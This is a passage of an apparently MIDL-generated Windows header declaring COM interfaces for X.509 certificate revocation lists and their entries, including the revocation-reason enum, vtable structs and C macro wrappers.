#define IX509MachineEnrollmentFactory_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509MachineEnrollmentFactory_CreateObject(This,strProgID,ppIHelper)	\
    ( (This)->lpVtbl -> CreateObject(This,strProgID,ppIHelper) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509MachineEnrollmentFactory_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0091 */
/* [local] */ 

typedef 
enum CRLRevocationReason
    {
        XCN_CRL_REASON_UNSPECIFIED	= 0,
        XCN_CRL_REASON_KEY_COMPROMISE	= 1,
        XCN_CRL_REASON_CA_COMPROMISE	= 2,
        XCN_CRL_REASON_AFFILIATION_CHANGED	= 3,
        XCN_CRL_REASON_SUPERSEDED	= 4,
        XCN_CRL_REASON_CESSATION_OF_OPERATION	= 5,
        XCN_CRL_REASON_CERTIFICATE_HOLD	= 6,
        XCN_CRL_REASON_REMOVE_FROM_CRL	= 8,
        XCN_CRL_REASON_PRIVILEGE_WITHDRAWN	= 9,
        XCN_CRL_REASON_AA_COMPROMISE	= 10
    } 	CRLRevocationReason;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0091_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0091_v0_0_s_ifspec;

#ifndef __IX509CertificateRevocationListEntry_INTERFACE_DEFINED__
#define __IX509CertificateRevocationListEntry_INTERFACE_DEFINED__

/* interface IX509CertificateRevocationListEntry */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRevocationListEntry;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35e-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRevocationListEntry : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR SerialNumber,
            /* [in] */ DATE RevocationDate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SerialNumber( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RevocationDate( 
            /* [retval][out] */ __RPC__out DATE *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RevocationReason( 
            /* [retval][out] */ __RPC__out CRLRevocationReason *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_RevocationReason( 
            /* [in] */ CRLRevocationReason Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CriticalExtensions( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRevocationListEntryVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRevocationListEntry * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRevocationListEntry * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRevocationListEntry * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR SerialNumber,
            /* [in] */ DATE RevocationDate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SerialNumber )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RevocationDate )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RevocationReason )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [retval][out] */ __RPC__out CRLRevocationReason *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RevocationReason )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [in] */ CRLRevocationReason Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRevocationListEntry * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        END_INTERFACE
    } IX509CertificateRevocationListEntryVtbl;

    interface IX509CertificateRevocationListEntry
    {
        CONST_VTBL struct IX509CertificateRevocationListEntryVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRevocationListEntry_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRevocationListEntry_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRevocationListEntry_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRevocationListEntry_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRevocationListEntry_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRevocationListEntry_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRevocationListEntry_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRevocationListEntry_Initialize(This,Encoding,SerialNumber,RevocationDate)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,SerialNumber,RevocationDate) ) 

#define IX509CertificateRevocationListEntry_get_SerialNumber(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SerialNumber(This,Encoding,pValue) ) 

#define IX509CertificateRevocationListEntry_get_RevocationDate(This,pValue)	\
    ( (This)->lpVtbl -> get_RevocationDate(This,pValue) ) 

#define IX509CertificateRevocationListEntry_get_RevocationReason(This,pValue)	\
    ( (This)->lpVtbl -> get_RevocationReason(This,pValue) ) 

#define IX509CertificateRevocationListEntry_put_RevocationReason(This,Value)	\
    ( (This)->lpVtbl -> put_RevocationReason(This,Value) ) 

#define IX509CertificateRevocationListEntry_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRevocationListEntry_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRevocationListEntry_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRevocationListEntries_INTERFACE_DEFINED__
#define __IX509CertificateRevocationListEntries_INTERFACE_DEFINED__

/* interface IX509CertificateRevocationListEntries */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRevocationListEntries;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35f-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRevocationListEntries : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRevocationListEntry **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509CertificateRevocationListEntry *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IndexBySerialNumber( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR SerialNumber,
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddRange( 
            /* [in] */ __RPC__in_opt IX509CertificateRevocationListEntries *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRevocationListEntriesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRevocationListEntries * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRevocationListEntries * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRevocationListEntries * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRevocationListEntry **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ __RPC__in_opt IX509CertificateRevocationListEntry *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509CertificateRevocationListEntries * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IndexBySerialNumber )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR SerialNumber,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        HRESULT ( STDMETHODCALLTYPE *AddRange )( 
            __RPC__in IX509CertificateRevocationListEntries * This,
            /* [in] */ __RPC__in_opt IX509CertificateRevocationListEntries *pValue);
        
        END_INTERFACE
    } IX509CertificateRevocationListEntriesVtbl;

    interface IX509CertificateRevocationListEntries
    {
        CONST_VTBL struct IX509CertificateRevocationListEntriesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRevocationListEntries_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRevocationListEntries_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRevocationListEntries_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRevocationListEntries_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRevocationListEntries_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRevocationListEntries_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRevocationListEntries_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRevocationListEntries_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509CertificateRevocationListEntries_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509CertificateRevocationListEntries_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509CertificateRevocationListEntries_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509CertificateRevocationListEntries_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509CertificateRevocationListEntries_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IX509CertificateRevocationListEntries_get_IndexBySerialNumber(This,Encoding,SerialNumber,pIndex)	\
    ( (This)->lpVtbl -> get_IndexBySerialNumber(This,Encoding,SerialNumber,pIndex) ) 

#define IX509CertificateRevocationListEntries_AddRange(This,pValue)	\
    ( (This)->lpVtbl -> AddRange(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRevocationListEntries_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRevocationList_INTERFACE_DEFINED__
#define __IX509CertificateRevocationList_INTERFACE_DEFINED__

/* interface IX509CertificateRevocationList */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRevocationList;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab360-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRevocationList : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_HEXRAW) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Encode( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ResetForEncode( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckPublicKeySignature( 
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckSignature( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Issuer( 
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Issuer( 
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ThisUpdate( 
            /* [retval][out] */ __RPC__out DATE *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ThisUpdate( 
            /* [in] */ DATE Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NextUpdate( 
            /* [retval][out] */ __RPC__out DATE *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_NextUpdate( 
            /* [in] */ DATE Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509CRLEntries( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRevocationListEntries **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CriticalExtensions( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificate( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SignerCertificate( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CRLNumber( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_CRLNumber( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CAVersion( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_CAVersion( 
            /* [in] */ LONG pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_BaseCRL( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NullSigned( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_HashAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_HashAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateSignatureAlgorithm( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AlternateSignatureAlgorithm( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignatureInformation( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawDataToBeSigned( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Signature( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRevocationListVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRevocationList * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRevocationList * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRevocationList * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRevocationList * This);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRevocationList * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRevocationList * This);
        
        HRESULT ( STDMETHODCALLTYPE *CheckPublicKeySignature )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRevocationList * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Issuer )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Issuer )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ThisUpdate )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ThisUpdate )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NextUpdate )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NextUpdate )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509CRLEntries )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRevocationListEntries **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CRLNumber )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CRLNumber )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CAVersion )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CAVersion )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ LONG pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BaseCRL )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
